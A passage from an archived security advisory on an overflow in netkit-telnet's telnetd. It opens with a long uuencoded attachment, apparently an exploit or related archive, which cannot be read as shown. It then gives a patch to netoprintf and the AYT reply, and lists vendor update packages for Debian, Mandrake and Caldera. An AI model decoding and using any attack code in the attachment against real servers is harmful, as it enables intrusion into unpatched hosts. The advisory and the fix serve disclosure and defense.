	MD:?*EG4?OBQ=/^YAJ:=L*9^4XD&\'\'@*JXLR@G.&\'Q`GQ83WJDK4UJC(WE\"\\X

	MW6BKVLQA_X7X:7AVIHM8(4;>HF+LAHJ7W1ZUXJVZDF9.EE[YKI(Q6A1H9JU;

	M[;\"R6O_=F!;CI;H,EF#$>8;1K;(!&`*W^1&T;\"[707?`QP9_V$;_U]YH\'Y0K

	MC9Z+\\\\%/VX/SMV(XPCC*6!<+^\"EGH<%1Q-TKNE4LKEH+:G0(^-O^V9N!!@:4

	MH0H>`Q;CNP2L:%ZY#[M\"I=\'`1+:KRT5F09[.B0/JU7E-?S/1:13$\\FLNRL-3

	MI8O\'Y<56BBX55IENXS=5`I.?IT>N&\\3E%?1^GFK75A&U($YJ;>C]<\\I%X;_A

	M!M))-F@\'<$`Y2QP\"X]5V.\'\\\\O2]B:DZY.#&&)_)&AF6P3:E7UR4#D,D@<6]8

	M2^&;_M>BR-Q2LIBRN6`QP2R4-XQ$-RR@GL2.5Y(-T2*R$7[\'129J6U`Q[+9@

	M+[1X:P5Y:+=QL,%Q!E(<&+[1H)QWZ+OE\"]<;I0T`09\\XF6$!5`C@UBV!7^J0

	MTG#PE*T.29?N1A7NL_[V07FS?H-GT-Y+RH;.;Z\\^M9Q)2F[U5-8W90$>R-I$

	MO09N4-7CTNIJ;1#Z,8M82:0J$#)C@DK65)=]THSBU3;#]!(`%CQC7/7%-7SW

	M%_@#?3WS!4%\\Y5NC;Z)>>45[[<O>L#E;%3KB01/&JWPF+0Q3;;Y\\7=EDKS;$

	M>!6[3O?5Q,0]+KVJK:<LO[!=`BMD[`^]NUV2MH348)ZNX*=M\\D;/5QPTN5=A

	MTM*^3:ZAOLRB#+B!.8320$$8=/;?[5U[<QI)DO];]2EJY?$:UH\";EX3PC!V,

	MA3W:DRV?)-_,Q*Y/UT`C]1IHEFXD<3\'WW2]_F57=U;R$\'7NS<1MJ/X3HJJQ7

	M5E:^2^?VFGM:647QYAUG2(%0`KLY33\'@^EY&.+@/J?8DU04R;8KO`OJR0&^O

	MHR3QH?R$9<#7(ZCDH\'_Q\":$L:[[G4\'%NV++\"W?LIY\".BA4\\\'HA\"%8D\'OEPQW

	M0X6\'?#00SSH0!P;,D2R\"P>:RG%WP*@PGEMZ@W\\CE\\;PJQXUI[]W9);4D3<P\"

	MXU/*/!73?,M399(0,R0_%(0;R>#\\VNW\\E\'(H9F6N8?TB:L@$NFV,399$LD@0

	M&@GGQNILB7*/HD@\\1VP-Z)\"!4WO\\WQ[Q#7_Q/LO/ZF<4\\#S]RR_XG_[N>2WS

	MR?/V[`?^7$T_&[BBW?[E%ZBFA62GFN6\"Z*J+J<(;\'5NG$<^,:%0`RF,/_IVI

	MW9/7/)(X],P$BF]NK69$K&0Y7&6\"9$Q&,DIMK(YW_H(5V22@H`FK90?ABI\'[

	M!M3\\#GXV2.H2C:\"3IOU0XI/38_L.\'6W(QL$F\\3\"A[3\\T:)IBIEW1BT`,ED;=

	M3[W(!#=W5ZW8*YX?E*K>PZ6:.Y5JE*I%DX&%%8,RB^)\"9(UA=IZ\\SVUK]G#X

	M@PG;2%AR)$9&K`_6-&MR%,$\\8\'.4L\"%D&(U@7-HV\'=[.TU\';::#574KM4J9L

	M(-F9P:JW>?=\'H6@39*[TVN$9IPBJL^/PRCL-KUS?J52CU%JSVOF5MH:<MMC!

	M([\'-X5O3>1GG6OO5SS]US[OZN*/?G\'VX/#\\[A;1P>09AW;BEKY\\.!OXU<[+3

	M#B@?EE*C%!N\'<H-&;[97/\\K668C7+%GH\'K&_;%N6`<DYR0RTF0+>&2F-9;)B

	M\":W9.U-DI?DMLS+19SK]!IB.WQS[FF6OF71]\\7M1-,Z80*H@P4BE%,R5G\"6;

	M[,?C_DOC8)[,PNMKDA\"0^6?!V;S2U3%BX_ZGB^[Y/C$2493L%ZWU=1H,B;@N

	M=BELF^!3*I(8-^FR3N4<=\'2I[QR[-9!P*G&J3^>(S_1,+DQ?L`RE4\\$P][V1

	M(,*7:>/F-X9MYSS7MR5[*,DH:8>69`#S/3/RS#4:N?99Y]E+B41C]WD;%>\'8

	M33FNI>^$N.87*A=>K?6X7W[%!PN)S(?YKX>#S4`*Q\'B4$3::J]\'[LJ6&1>\'G

	MR\\OB,K?V@Y7\'<_H]%^*Z2BY3)HED9E$<0W$YI)6@TP\'G#LNF<SAK!CCJK^?0

	M2+J[34=?\\H*@6*N^A+2>P;YLKY09,OQKZFO&G!&HEK6RVS.^D!GX)2Y3=FLQ

	M8S]2&3\'\'R\\\"[E&8N&%@FQ-J?V8&`_91<5@:EV;\\KK6*H`K8):N>V/=&K_X\"J

	M(V;>6@QHC&W&E.[=MVHMCYDGSG5%+?=HMEZ_?LU8MFJ@BV3C.0`.JMW-`(A1

	MM73-RG_I[ZD]3WY^KF3V/[5GQ_]#BE2M>K,FR;O$XZ.\'9115&8)>!CU601-G

	MW[]!=Z8A,\\U\\7BSY8%!/KP-=M1W$Y-G.\\>>5CHEIG]N)>G\\;S,=36Q?<N:W+

	MGU?JPM)I+`<`3G@X#J]O$BN/6!<7Y<R+&7N91ZQ71RR4;<E#!1%0-8DF$_W!

	MD@0CJE]7#.$AT1C,FZ>Z+D-A8F3/V8[K%B,`Q*P@M23/D`@>!@[[]B%O80]>

	M>N/Y*$$*(2!&75S68&\\P_&&1#VN)&UHY/ZDI^E1.D2X3V>VI#%K$O&.Y1836

	M3F!YE9;3=TT:V`M=:QXX>E_3J$.NI<E6V;;P)ZI03O\'283\\^O7_?.?]5G$).

	M/W6)2_FI<RGJVQ^[FDZTX_:2#>62$<*UC?\\UP9^G,:9S&6V<8BX0:&S=Y3`@

	MEE;$ECY^P\"?)UER9>A?(1YH*SA+(,T[+2&5FH74ORIIWIVQK)ZPW4\':BY?J1

	MK88+!9O+IF!(D%J4,Y*:X</F5Z(2N9DRA3-?\'K>P^6ISA6BU0K2Y0CJ?6060

	M?J<P>UK+>_QAM7\'$YU(JE`N?%O:_^\'$LC)JMS.\'6XD-*/!*CM8A$1\'#K!ZV#

	MAD&U3+N<&N[F_2_IF4CO.*J!O8\'AR1KC-W&.7J2N<VF7]O;27MV&P=V50=&,

	MAPQ7F1KCFF\'4DUD_G@Z*6A`]3%$]7,;RU/HPCXE`&]O#-#<3QH<VY\\YNO=VW

	MN+4O;<5/@-^&Q?3[:)K$KQA]W0+E&UDD.NQ9#!W3.E.5)3#E6Y2Z#?M).-8G

	M\'Y??RD+S8)=?,>)\">&#[(&//)!IS\"@Y!JN4*U[D*SF98+ACF\"MK=MJ\'P#(4E

	MPC\"<$@.3),%XFC@1,;$NT`\'RWPN@#=\"/2N7]J,6-.LE<J(O+<UT>H!%SZ(A3

	MMW\'A-%ZV;$IF/UM&3L.O$9(2\"V?R&<,A6E<]8;4&T4H3TVP<LBD*T62$0.N[

	MY:)_G71N_7#$G)P0Y-C2Z3R.P_P\"-QK/Q4N:1E-\"7(.BV#H\'`9%7HI+HZ%_Y

	MSJS(RO?``9M\":,();LPNH49R^Z3$31FV>5.A(OJ?>PGN\\`<M;E>Y%SFVP[!?

	MN0+\"$J%_5G4(O@_\\M7$%`S<,IX1@\'(Q[$B1E8CFLYUAJF4SGSU`19T*)@;@@

	MDOX%_O\"Z5?\'V2RN)@+Q[K^4UAL->:\\.[YD&]YFUZ=_SFL)591L9^..%%I-;3

	M\"*P_T2^WQ=2-S;J([66\\L_Y!HG594STU-KTIE#4FD#LW1&.(0!.P\\H,@\"FE#

	M.U0IYX4B%@1\"W2FO%)TWTX2KEE\"ZM\'_;ODG:0?NZ\';9G[4%[VMZ7-!?EZCJ+

	M>GP7)OT;`-MF;^_[Q$8\\NWW6?M!F;M$RG)8()O6H9%)M;7^<)+?25D)M(?MM

	M.IU^$H4%`2E)9S+[D\"2PE7J!J0>32-SW)T-3I[3_=+I?^B-.6\\<2E5HRK%L0

	MD!A$<#_?1@8_W`[?\\@O;VG\")[<9VKK>W`R9F6QN6\\N^OS%76Q,PT(6Z152EH

	MUT^\\@=PES,``2@9F8,`LATOLN&!34]WZ5FZOMA&1!L\'0)Q%B,X)*:S<[H/#R

	MUEM^[SIY*)LKA04)^,#9-\"X6<;%&^-WOQ04K5[^R%*\\L^8I7-KMM(\"=UVB_3

	M0^KGSOF\'DP_OVOK$^.GCA.7((UB,YGH0#N#3&D_I4!TN@-N55.^Y:?`.,VD\\

	M_%P_KXQQ7/$\"%\'<\\XXJ0]_.45^(C6K@X>7?RX;*4\\S3-O[[LGK]??9^)HS9W

	M13@)DQ`I7>`I`(&6OL\\\"<.\"%EBMQY\\>B^R!69$#LX00J&@3E+$10@+`TX$,I

	M&H]]:%X1Y@O6CO4`\"N$-)HV^K^-1$$P1],:^\"C:#.F+FJ)C:2Z7OB\\O.NRZ\"

	MXBJ.5D>477%.3_W&O`67@^YF<YZI9@SZY&4NZT4G/9?DRKG*UJG.Z4^539%F

	M=B\"M`<D*$O,QB((86,.20)I_^2Z09&TLN$Z\"N[+142Q9FHS\")`_9\\JR.N^\"2

	M1I=JS^:#0*A57AWA:\"$RT^J$8SN,>D:T-]D\\%#YQQ\"(P!)TT\"E\\P\'T:+`._O

	MM`@$+%.$_1L1OGD]Z/&PG,G;<V:O!I]*LZ&<^)F\"I*))YOXH-0\"NFYZ:.$_J

	M-<7CRJI=8O/(:TLCW[KD]9RJG`I$\\9J^U2L2EL@E;2=9;HKE6A#3AK42[+)`

	M!-/IY\";$A+:2=M(@F@0V&VZJ$)DMN\"M1*GHZ\';%B,\"^143!)[.\\@76VFC>`T

	M@<DX[8PD**()-OB\\WZ<>#ND`(7X[$9-CP\"<.;CP)B1BP+,U\'%#4\"<0<V>1`5

	MQ#%S`#-RZ11-\'<G<K]TT-?#TA(A(?.O$6`/^YRMC]_\\1CQ/__YYHY9!XR7]X

	M&P_E_Z@>FOM_:H<\'A_7JX_T_O^/SYNUIY]T%,24_XX`LG]74V8]_OF!O+IL,

	M(M(F$C92*ONZK;\\KH&A1*:K9=BHH!0_!\";%QL[$N#TD^HIKVLUOLGSWVQR>W

	M_\\^[G>/WW?^#-AZZ_XMVO;W_Z[#IU:A\\[:#^F/_C=WF(8QSZ_:\"MRN91EV!Q

	M>W..@*6%>YJ>CM!]F9O`>O/12-(K^,C8@[RX./,X10\'S3,K:EV(60JPUAY7>

	M]6(%$LIT%O4(Y@+MH\'+$F7($1&\'.-WITSNB4)_)\"O+_$J+!K\\9UDIZ\":XJ4\'

	MSZREM!2N>Q8[9HGKA9\\HPPMD^2FX[>%\\QJUS4^!-J8N=41PQ]V,LOLC4D03]

	MFTGX]SEX1)7C&@J2Y\"(._#$;&ECLDI03L-=AR&_UR:4^/NM>?\'AV*8DXP\"):

	M,$5Z^^Q\"_]A]TR$N6)_H-V?\'W6-4.3WYMZY^<][Y^`<W(XI=\'30DGA3JHYU1

	MN,@@Q0\"/D+T8X+:8@!O&U];@\'!JG*`)Q+\\!DRA2G6*\"A7YJALU:4UHM>TU^2

	M*OK!E%T>\"[9UHWXM5I0Z,:&3PR`8B2L*1NB\'S.6,Y_T;SF$1]\'TLEG3%ISD*

	MOL0R:7/).<5`U)T_F?C&WXMX3+FR#$&GD+/H--+61YPOFYO1LH>$S+JP(%0[

	ML7FKYLQ*TBDETAUV,GR\'Q)9RK^<SE:0LI5D-8^]8%^4$09H\'*(9TQI$\"2T=W

	M-\\%$X3H6E&+)P;?).Z@=S`U2UYQ]./TUYQ9@4M,8L:/\"^6W8<1UWVT0P@D$Q

	M/3,KB.84L:\"(?A=%N,_H>D(<[6W`NPT.<?Z,9+4!!^GF/`A8LI/^<RX67\\\'O

	ML\\C;\"U,[G5+5&!]%%QN+^8V%$]C()8&\"V=RI<ZS=RRJ2:86[?Y$38LPGD\\C&

	M>$FSLJ28UPH\'O)PB&TJ>!2],PZ#/-L,^\\:3%C#AM>=0377%26.GRK:[6#BL>

	M_:GJ<J(]E5-@J#4\"MMK%.JM6[;\'K-2<YK;1:-L!NTK?4J^HAZZLM6JL=5FMJ

	MNYDU`\\R9&%9AKQI5I72]U5#K;:>K??;NC7I=K1I/UX\\2-5CIKE:MIUMJM.K]

	M7(VE\"5E38]`_;\"FQ[CW\\.,95M5F3HM2#:@WUS1H)I?Y2_?R<D\">):\"<.5KKX

	M`(H_T=-8^_-[_1MR_TRIAQ7+;3/5XZ=9;=1H>BH>_JMK7:W7#[0^H/]>VV8N

	M>`)K[7H=/]N<XV,]I&8*J09(M9;6C>:!3I)%+0^I82$M=^P)ZU=>S./9BQCI

	M#;)7W%/U[L,G+M&L8`M/%S-V@T\'HHWX[\"P)]$0T3WF9OH_G$^D6?3/H5]>[X

	M1V8N4\"HVI4J:+S*0M%]8<(!_%TR\"&1&ACY()\\93.$-JFXEV-:%VJIXC0<>:7

	MS$K%)]\'@!;)_A<@IU)LGR`@V#87-\":$[0$1O/YAQ.@9<\'1BB>W%%72ZF\\!\\#

	M>:8:.\'SVV1<J\"$Q>,:>H/>+\\7AR-J`TZBXD%H\\\',B/(OF\'^AD5:T=H#:M_NY

	M[&3\"VV%:H/RD1H;A]1QS0;_MA_7603FV1*O,^=_V\"74+U-@@0\'8I)I6+<2\\:

	M@6.CP8\'$JQ=$_*]G_G@<OC!$/\'YA10HL8%M_B*!1N=%0+FB>KAG186)B*JK#

	M?E?F[#6`VFN1H:0_A@8CSND8S_4%M.S%*.SAWSP)1Q7BW+#K6\'M$!XP/YB_K

	M^6RU\\\':8?90YV`6@E-P&;2`SBW*UAR&ZI;?W<1+\'5YC@>$?(RS64=]_PO*`V

	MK#;`\'%U=8317G*2J4%PW\':I`N[)H\'.7^:$BQ^@ZWIQ:^SU+LL94?\"<2Q\\\'[B

	M%TO:(A3G+GD%QU.FU5ZUT=#[^P;N_8M&[SY[H;(BWYNV7K6%S`\\]^=D?RD^O

	M:7ZV#\"C8;)-@PN<>YQN)Q1`1J^Y]T&>T%\"O0?ZU#O&<E05RD*=/!:%BOE;%5

	M*LJVXC5:WK!1?F4^5[U#6`KH-WZ&C;:N<`C\"5\'=.3\\_>Z-.SSC&<0X^9$SSN

	M7\';T3YV+*WBN=S]<7KAPJUXK@TNT-8-+;P@N5/25SH\\G93IHO@%Z+8->/^J[

	MT&N`?N/\'-U\\/E2\"E4(^J+E1Z0U`\'BPEAX]?#)5@IW\'ZSZL\"E-P9N,OMZN/UF

	M+84[\\&H.7\'I#<*\\G\\PJ=&%!X?SWP@9<AQJ#9<(#3FSSPJV_H.X%TP+MS36\\(

	M_\"P8L0?\'-P#.)GO0R@/N&\\#PU_UZP*T,\\##(`6Y9P-/1-_28@%G`1U[510]Z

	MPULP7`\\5<O8FJ`0IG>\"C1N\"L7Y7>$-1-7=T*E`!9H(,C=]]5Z0T!97+YM5`!

	M*8/:<VA%\\XCWW9!FX!N@]CT+-?\"]\'-2^A_6*^*[1KUVNH5]+X0Z\'#6=B#^@-

	M=O,2U*W`\"(`#S.GD`;TA8,$-;KDAYFUW@*T,8-/+`01E!/<2[PZMZ8RUF>M>

	MD\\?ZE=!LWYI$^O+0T+>E_;X%%M=/854;SC@/Z8W05\'],\'/&N\\`C&!GCT&\\&+

	M03-VJ-QO\'#16*J?TQE8R#U=B3?)@M1*,]P$G[S18N:[U94!5SP74X)V.HW8#

	M%,,(O;AW1O)<`AS4=WRK9\"KN2M&_LR+(L+OL=C\"?0#U&//R_ST7!A8#0@K@F

	M<&1\"F!1?Z\\(\"7-2DJ!?J.+\",,[-FN[+.3_3P6CT@1%(A&ZU0/E\\OF!GQ4F(3

	ME)T_04^_I<^OB$&Z^O.G]Q^O+D[/+C6G(UU7MK>NK\"GYD#Y\'EP/-N#(D!K`<

	M9I.LR]?:@O^74_I4CYI>8W>E3_/`\\W97^M0:K7\\%I0\\PXO^7TF<W3Q\"U-G);

	M99D%\"#FJGI-<`&O)W^$7!/+GRWI\'JV6]HPUE6VO*MM*R:X.HER`<K(%PL*&U

	MYIJRS0UE&VO*-C:4K:\\I6U\\912Y6>@E\";0V$VH;6JFO*5C>47;-NGK>A9V[8

	M<@Y,XVAUF>B[M4TVC@[7E#W<4\'9U0>B[K.PV/R2+W@\\Z$ZEM?D)*K?7[40_&

	MN%B3\'QTH<I;0T2$O#$\"O(G\\`3$X+MNO0]ZH;]_TINT?!M$2[F,[J9__Y^5E%

	MA8.7:AX.?O`*:+:HK]W/LV@^C>VOJFT]\"-DXPXHSA1B!ERKSB=2<C9.5DC24

	M``9/&%DJZ@E,).>YZQE8Q;G>)D*+!LMGS-GI;^30T^HRG+8=3\\BYEISC=@D0

	M@V%N50PG\">H7;&<Y-\"/+;%\\$J-JZ1/DK`1Z%*0(VV`A6GK\'9^`L\\)(D\"!@M.

	M@D^M,HN1W$3:.$_%\\WM=5\"?LE6DBC4R01Q8<B]0`A8F?S&<<?!3J&W,5`X?,

	MWH:^GDZGNE#%AN*\\^N8\"!C>I?B$<2Z\"AL6(SDL^ME<K&(RCH8V_F\"6YQF,_,

	M#+\"-CV80MLORK$AX,$WDTL#RB3[[=/GQTZ4N3WE*RV6YR+Q6IX_T15DN0T,*

	M;_PK_TT?GY]]U.J.8S0);W$QC+V$`9.%7JW.U]A?]`*VG!\'V]$?S>!D9U`FN

	M!$BB\".;?`7))^HO7ZN>`_8\'1`)M7S<UT:1\"4S[$*L\'-*.+-)0D]3;!U`L=Y\\

	MW8`*QS9=>T5W)[>II9#P!)<AC`*3\"MSOX_X-6!U[LWD2$&(C`\\O->#Q&@9:2

	MM.\"IS5VN0$`7,!G8W,4L<?D38_X%:\\R!(SJU=M-2JC6K_/*8;TI(+=_@J,\'S

	M&#0U*!]G?@@%VC!)6QEG3K/>+X^+DI?ODCKVC`VC8<Z0*>G_LXF$#S\"V&O9-

	M:K`]>:_?=H_UIX]_4`5V1\"9>@/7N/\";V1#8$WL%[OB:\"^L7I,67\"%\\:>S,D0

	MBJJO%[Y2FX+7T)7L.@?<CRWW.6!`_VRWD\\?G\\7E\\\'I_\'Y_%Y?!Z?Q^?Q>7P>

	/G\\?G=W[^%_\\E9$X`H```

	`

	end

	11535 bytes

	

SOLUTION

	    Quick patch:

	
	    --- netkit-telnet-0.17/telnetd/utility.c.ayt	Wed Aug  8 16:33:01 2001

	    +++ netkit-telnet-0.17/telnetd/utility.c	Wed Aug  8 17:20:39 2001

	    @@ -56,18 +56,25 @@

	     void

	     netoprintf(const char *fmt, ...)

	     {

	    -   int len, maxsize;

	    +   int len = 0, maxsize;

	        va_list ap;

	        int done=0;

	

	        while (!done) {

	           maxsize = sizeof(netobuf) - (nfrontp - netobuf);

	    +      if (maxsize < 0) {

	    +	/* no way this is gonna fit - try to flush some */

	    +	netflush();

	    +        maxsize = sizeof(netobuf) - (nfrontp - netobuf);

	    +	if (maxsize < 0)

	    +	  break;

	    +      }

	

	           va_start(ap, fmt);

	           len = vsnprintf(nfrontp, maxsize, fmt, ap);

	           va_end(ap);

	

	    -      if (len<0 || len==maxsize) {

	    +      if (len<=0 || len==maxsize) {

	 	     /* didn\'t fit */

	 	     netflush();

	           }

	    --- netkit-telnet-0.17/telnetd/telnetd.c.ayt	Wed Aug  8 16:33:01 2001

	    +++ netkit-telnet-0.17/telnetd/telnetd.c	Wed Aug  8 17:21:44 2001

	    @@ -1277,7 +1277,7 @@

	 	    return;

	         }

	     #endif

	    -    netoprintf(\"rn[%s : yes]rn\", host_name);

	    +    netoprintf(\"rn[Yes]rn\");

	     }

	

	     void doeof(void) {

	

	    For Debian:

	
	        http://security.debian.org/dists/stable/updates/main/source/netkit-telnet_0.16-4potato.2.diff.gz

	        http://security.debian.org/dists/stable/updates/main/source/netkit-telnet_0.16.orig.tar.gz

	        http://security.debian.org/dists/stable/updates/main/source/netkit-telnet_0.16-4potato.2.dsc

	        http://security.debian.org/dists/stable/updates/main/binary-alpha/telnet_0.16-4potato.2_alpha.deb

	        http://security.debian.org/dists/stable/updates/main/binary-alpha/telnetd_0.16-4potato.2_alpha.deb

	        http://security.debian.org/dists/stable/updates/main/binary-arm/telnet_0.16-4potato.2_arm.deb

	        http://security.debian.org/dists/stable/updates/main/binary-arm/telnetd_0.16-4potato.2_arm.deb

	        http://security.debian.org/dists/stable/updates/main/binary-i386/telnet_0.16-4potato.2_i386.deb

	        http://security.debian.org/dists/stable/updates/main/binary-i386/telnetd_0.16-4potato.2_i386.deb

	        http://security.debian.org/dists/stable/updates/main/binary-m68k/telnet_0.16-4potato.2_m68k.deb

	        http://security.debian.org/dists/stable/updates/main/binary-m68k/telnetd_0.16-4potato.2_m68k.deb

	        http://security.debian.org/dists/stable/updates/main/binary-powerpc/telnet_0.16-4potato.2_powerpc.deb

	        http://security.debian.org/dists/stable/updates/main/binary-powerpc/telnetd_0.16-4potato.2_powerpc.deb

	        http://security.debian.org/dists/stable/updates/main/binary-sparc/telnet_0.16-4potato.2_sparc.deb

	        http://security.debian.org/dists/stable/updates/main/binary-sparc/telnetd_0.16-4potato.2_sparc.deb

	        http://security.debian.org/dists/stable/updates/main/source/netkit-telnet-ssl_0.16.3-1.1.diff.gz

	        http://security.debian.org/dists/stable/updates/main/source/netkit-telnet-ssl_0.16.3-1.1.dsc

	        http://security.debian.org/dists/stable/updates/main/source/netkit-telnet-ssl_0.16.3.orig.tar.gz

	        http://security.debian.org/dists/stable/updates/main/binary-alpha/ssltelnet_0.16.3-1.1_alpha.deb

	        http://security.debian.org/dists/stable/updates/main/binary-alpha/telnet-ssl_0.16.3-1.1_alpha.deb

	        http://security.debian.org/dists/stable/updates/main/binary-alpha/telnetd-ssl_0.16.3-1.1_alpha.deb

	        http://security.debian.org/dists/stable/updates/main/binary-arm/ssltelnet_0.16.3-1.1_arm.deb

	        http://security.debian.org/dists/stable/updates/main/binary-arm/telnet-ssl_0.16.3-1.1_arm.deb

	        http://security.debian.org/dists/stable/updates/main/binary-arm/telnetd-ssl_0.16.3-1.1_arm.deb

	        http://security.debian.org/dists/stable/updates/main/binary-i386/ssltelnet_0.16.3-1.1_i386.deb

	        http://security.debian.org/dists/stable/updates/main/binary-i386/telnet-ssl_0.16.3-1.1_i386.deb

	        http://security.debian.org/dists/stable/updates/main/binary-i386/telnetd-ssl_0.16.3-1.1_i386.deb

	        http://security.debian.org/dists/stable/updates/main/binary-m68k/ssltelnet_0.16.3-1.1_m68k.deb

	        http://security.debian.org/dists/stable/updates/main/binary-m68k/telnet-ssl_0.16.3-1.1_m68k.deb

	        http://security.debian.org/dists/stable/updates/main/binary-m68k/telnetd-ssl_0.16.3-1.1_m68k.deb

	        http://security.debian.org/dists/stable/updates/main/binary-powerpc/ssltelnet_0.16.3-1.1_powerpc.deb

	        http://security.debian.org/dists/stable/updates/main/binary-powerpc/telnet-ssl_0.16.3-1.1_powerpc.deb

	        http://security.debian.org/dists/stable/updates/main/binary-powerpc/telnetd-ssl_0.16.3-1.1_powerpc.deb

	        http://security.debian.org/dists/stable/updates/main/binary-sparc/ssltelnet_0.16.3-1.1_sparc.deb

	        http://security.debian.org/dists/stable/updates/main/binary-sparc/telnet-ssl_0.16.3-1.1_sparc.deb

	        http://security.debian.org/dists/stable/updates/main/binary-sparc/telnetd-ssl_0.16.3-1.1_sparc.deb

	        http://security.debian.org/dists/stable/updates/main/binary-sparc/ssltelnet_0.16.3-1.2_sparc.deb

	        http://security.debian.org/dists/stable/updates/main/binary-sparc/telnet-ssl_0.16.3-1.2_sparc.deb

	        http://security.debian.org/dists/stable/updates/main/binary-sparc/telnetd-ssl_0.16.3-1.2_sparc.deb

	

	    For Mandrake Linux:

	
	        Linux-Mandrake 7.1: 7.1/RPMS/telnet-0.16-4.1mdk.i586.rpm

	                            7.1/RPMS/telnet-server-0.16-4.1mdk.i586.rpm

	                            7.1/SRPMS/telnet-0.16-4.1mdk.src.rpm

	        Linux-Mandrake 7.2: 7.2/RPMS/telnet-0.17-7.1mdk.i586.rpm

	                            7.2/RPMS/telnet-server-0.17-7.1mdk.i586.rpm

	                            7.2/SRPMS/telnet-0.17-7.1mdk.src.rpm

	        Mandrake Linux 8.0: 8.0/RPMS/telnet-0.17-7.1mdk.i586.rpm

	                            8.0/RPMS/telnet-server-0.17-7.1mdk.i586.rpm

	                            8.0/SRPMS/telnet-0.17-7.1mdk.src.rpm

	    Corporate Server 1.0.1: 1.0.1/RPMS/telnet-0.16-4.1mdk.i586.rpm

	                            1.0.1/RPMS/telnet-server-0.16-4.1mdk.i586.rpm

	                            1.0.1/SRPMS/telnet-0.16-4.1mdk.src.rpm

	Single Network Firewall 7.2:snf7.2/RPMS/telnet-0.17-7.1mdk.i586.rpm
	                            snf7.2/RPMS/telnet-server-0.17-7.1mdk.i586.rpm

	                            snf7.2/SRPMS/telnet-0.17-7.1mdk.src.rpm

	

	    For Caldera Linux:

	
	        ftp://ftp.caldera.com/pub/updates/OpenLinux/2.3/current/RPMS/netkit-telnet-0.17-12a.i386.rpm

	        ftp://ftp.caldera.com/pub/updates/OpenLinux/2.3/current/SRPMS/netkit-telnet-0.17-12a.src.rpm

	        ftp://ftp.caldera.com/pub/updates/eServer/2.3/current/RPMS/netkit-telnet-0.17-12a.i386.rpm

	        ftp://ftp.caldera.com/pub/updates/eServer/2.3/current/SRPMS/netkit-telnet-0.17-12a.src.rpm

	        ftp://ftp.caldera.com/pub/updates/eDesktop/2.4/current/RPMS/netkit-telnet-0.17-12a.i386.rpm

	        ftp://ftp.caldera.com/pub/updates/eDesktop/2.4/current/SRPMS/netkit-telnet-0.17-12a.src.rpm

	        ftp://ftp.caldera.com/pub/updates/OpenLinux/3.1/Server/current/RPMS/netkit-telnet-0.17-12.i386.rpm

	        ftp://ftp.caldera.com/pub/updates/OpenLinux/3.1/Server/current/SRPMS/netkit-telnet-0.17-12.src.rpm

	        ftp://ftp.caldera.com/pub/updates/OpenLinux/3.1/Workstation/current/RPMS/netkit-telnet-0.17-12.i386.rpm

	        ftp://ftp.caldera.com/pub/updates/OpenLinux/3.1/Workstation/current/SRPMS/netkit-telnet-0.17-12.src.rpm

	

	


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH